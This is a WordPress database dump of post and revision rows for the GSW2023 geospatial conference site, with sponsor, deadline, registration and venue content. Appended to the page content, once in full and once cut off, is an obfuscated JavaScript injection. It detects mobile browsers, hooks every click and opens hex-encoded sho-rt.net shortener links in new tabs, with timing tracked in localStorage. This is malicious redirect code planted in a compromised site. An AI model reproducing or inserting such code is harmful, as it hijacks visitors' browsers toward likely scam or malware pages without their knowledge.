timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:15:48','2023-04-02 01:15:48','',3066,'https://gsw2023.com/?p=3986',0,'revision','',0),
(3987,1,'2023-04-02 01:18:44','2023-04-02 01:18:44','','BDStar','','inherit','open','closed','','bdstar','','','2023-04-02 01:18:44','2023-04-02 01:18:44','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/BDStar.png',0,'attachment','image/png',0),
(3988,1,'2023-04-02 01:19:42','2023-04-02 01:19:42','','Applanix_CYMK_OUTLINES_Horizontal_Blue','','inherit','open','closed','','applanix_cymk_outlines_horizontal_blue','','','2023-04-02 01:19:42','2023-04-02 01:19:42','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue.jpg',0,'attachment','image/jpeg',0),
(3989,1,'2023-04-02 01:21:21','2023-04-02 01:21:21','','LOGO of HDP center- final0730-1','','inherit','open','closed','','logo-of-hdp-center-final0730-1','','','2023-04-02 01:21:21','2023-04-02 01:21:21','',3066,'https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1.png',0,'attachment','image/png',0),
(3990,1,'2023-04-02 01:34:20','2023-04-02 01:34:20','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const 